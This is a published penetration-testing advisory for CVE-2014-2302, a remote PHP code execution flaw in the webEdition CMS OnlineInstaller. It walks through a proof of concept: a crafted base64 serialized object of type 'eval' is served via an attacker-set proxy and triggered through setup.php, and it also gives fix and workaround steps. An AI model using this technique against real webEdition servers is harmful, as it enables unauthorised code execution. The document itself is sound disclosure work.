webEdition CMS 2.8.0.0 Remote Command Execution

`Advisory: Remote Command Execution in webEdition CMS Installer Script  
  
RedTeam Pentesting discovered a remote command execution vulnerability  
in the installer script of the webEdition CMS during a penetration test.  
If the installer script is not manually removed after installation,  
attackers cannot only reinstall webEdition, but also gain remote command  
execution.  
  
  
Details  
=======  
  
Product: webEdition CMS  
Affected Versions: webEdition OnlineInstaller 2.8.0.0,  
probably earlier versions, too  
Fixed Versions: webEdition 6.2.7-s1 - 6.3.8-s1  
Vulnerability Type: Remote Command Execution  
Security Risk: high  
Vendor URL: http://www.webedition.org  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-004  
Advisory Status: published  
CVE: CVE-2014-2302  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2302  
  
  
Introduction  
============  
  
"webEdition is a flexible CMS for companies of every size. It offers a  
great amount of functionality and can be flexibly customized for  
individual needs. It is ideally suited for users who want to operate  
their website comfortably. Even the creation of custom web applications  
is easily possible with webEdition."  
  
(translated from the webEdition homepage)  
  
  
More Details  
============  
  
The webEdition installation script is not deleted automatically at the  
end of the installation, even though it contains code to delete itself.  
While an attacker who finds this script could just destructively  
reinstall webEdition, it is also possible to use it to gain command  
execution unnoticed on an existing webEdition installation.  
  
During installation, the installer first checks whether outgoing  
connections can be established by sending the following HTTP request to  
update.webedition.org:  
  
GET /server/we/onlineInstallation.php?update_cmd=checkConnection&  
HTTP/1.0  
Host: update.webedition.org  
  
The server at update.webedition.org replies with the following HTTP  
response, which contains base64-encoded data (formatted and shortened):  
  
HTTP/1.1 200 OK  
Date: Mon, 24 Feb 2014 10:34:56 GMT  
Server: Apache/2.X.XX  
X-Powered-By: PHP/5.X.XX  
Connection: close  
Content-Type: text/html  
  
YTozOntzOjQ6IlR5cGUiO3M6ODoidGVtcGxhdGUiO3M6ODoiSGVhZGxpbmUiO3M6MzA6Ik9u  
bGluZSBJbnN0YWxsZXIgdmVyc2lvbiBjaGVjayI7czo3OiJDb250ZW50IjtzOjM5ODoiCjxk  
aXYgY2xhc3M9Im1lc3NhZ2VEaXYiPgpZb3UgYXJlIGN1cnJlbnRseSB1c2luZyBhbiBvbGQg  
[...]  
  
By decoding the response body it can be seen that it contains a  
serialized PHP object:  
  
a:3:{s:4:"Type";s:8:"template";s:8:"Headline";s:30:"Online Installer  
version check";s:7:"Content";s:398:"<div class="messageDiv">  
You are currently [...]</a>.</div>";}  
  
This PHP object is processed by the installation script based on its  
"Type" value. One of the "Type" values accepted by the installation  
script is "eval", leading to the execution of PHP code which can be  
specified as the value of a field named "Code", that is also part of  
the serialized object.  
  
Using the Python library phpserialize, a PHP object can be crafted,  
which executes the function phpinfo() when it is received by the  
installation script:  
  
$ python  
>>> from phpserialize import dumps  
>>> object = dumps({"Type": "eval", "Code": "<?php phpinfo();?>"})  
>>> object.encode("base64")  
'YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjtz  
OjQ6\nImV2YWwiO30=\n'  
  
The installer allows the usage of a proxy server, enabling attackers to  
intercept and arbitrarily modify HTTP requests issued by the installer  
and the corresponding responses by the host update.webedition.org. By  
setting a proxy server to use during the installation process which  
answers all requests with the base64-encoded serialized PHP object, the  
previously created PHP code is loaded and evaluated by the installation  
script, which leads to the execution of the attack payload. Due to the  
proxy server being saved in the HTTP session used by the installation  
script, execution of the code served by the proxy server can be  
triggered by opening the following URL:  
  
http://www.example.com/OnlineInstaller/setup.php?  
&leWizard=DownloadInstaller  
  
  
Proof of Concept  
================  
  
Use the OnlineInstaller at  
http://www.example.com/OnlineInstaller/setup.php to configure webEdition  
to use a system under your control as a proxy server. Configure the  
proxy to deliver the following file contents for all HTTP requests:  
  
YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjt  
zOjQ6ImV2YWwiO30=  
  
Reopen the following URL:  
  
http://www.example.com/OnlineInstaller/setup.php?  
&leWizard=DownloadInstaller  
  
After a redirect, phpinfo() output will be shown.  
  
  
Workaround  
==========  
  
The OnlineInstaller should be deleted or access to its URLs restricted.  
  
  
Fix  
===  
  
Update to a version with the suffix -s1. Those versions are available as  
updates for releases between 6.2.7 and 6.3.8. The newest, updated  
version would therefore be 6.3.8-s1.  
  
Note that the version check of webEdition might tell you that there is  
no update available and that you are running Version "6.3.8 (6.3.8.0  
Release, SVN-Revision 6985). It will still tell you that the newest  
available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so  
you can use the "Update-Repetition" function to get the fix for this  
vulnerability.  
  
Also note that the update does not remove the OnlineInstaller, but  
modifies the login dialogue to remove the OnlineInstaller instead. You  
will need to open the login dialogue after installing the update to  
actually delete the OnlineInstaller. To be on the safe side, check the  
OnlineInstaller directory manually for any files that still need to be  
removed.  
  
  
Security Risk  
=============  
  
Attackers can not only use the OnlineInstaller to destructively  
reinstall webEdition, but can also run arbitrary code PHP code by  
setting their own proxy server in the OnlineInstaller and inject content  
that is used as a parameter for the PHP eval() function. Since this  
attacker-supplied code is executed on the webEdition server with the  
privileges of the web server, this is a high risk, especially because  
the attack is not as easy to detect as a reinstallation of webEdition by  
an attacker.  
  
  
Timeline  
========  
  
2014-02-20 Vulnerability identified  
2014-03-04 Customer approved disclosure to vendor  
2014-03-06 CVE number requested and assigned  
2014-03-07 Vendor notified  
2014-03-10 Vendor acknowledges vulnerability  
2014-05-20 Vendor announces fixed versions  
2014-05-28 Advisory released  
  
  
References  
==========  
  
http://www.webedition.org/de/aktuelles/webedition-cms/  
Wichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht  
(German)  
http://www.webedition.org/de/aktuelles/webedition-cms/  
Wichtige-Hinweise-zum-Sicherheitsupdate (German)  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
https://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`